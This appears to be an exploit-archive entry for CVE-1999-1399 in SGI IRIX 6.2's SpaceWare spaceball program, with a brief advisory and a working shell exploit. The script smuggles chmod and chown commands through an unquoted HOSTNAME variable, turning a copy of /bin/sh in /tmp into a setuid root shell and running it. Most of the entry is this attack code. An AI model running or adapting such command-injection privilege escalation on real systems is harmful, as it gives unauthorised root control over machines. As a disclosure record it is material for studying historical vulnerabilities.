SGI IRIX 6.2 - SpaceWare
Author: J.A. Guitierrez
type: dos
platform: irix
port:
date_added: 1996-10-30
date_updated: 2012-06-22
verified: 1
codes: CVE-1999-1399;OSVDB-6333
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/471/info
The SpaceBall game, shipped with Irix 6.2 from Silicon Graphics contains a security hole which could result in the compromise of the root account. By blindly taking the contents of the $HOSTNAME variable, and not placing quotes around it, the spaceball.sh program can be made to execute commands.
#!/bin/sh
SWDIR=/usr/local/SpaceWare
cp /bin/sh /tmp/sh
echo 6 | HOSTNAME="/bin/chmod 4755 /tmp/sh" $SWDIR/spaceball > /dev/null 2>&1
echo 6 | HOSTNAME="/bin/chown root /tmp/sh" $SWDIR/spaceball > /dev/null 2>&1
/tmp/sh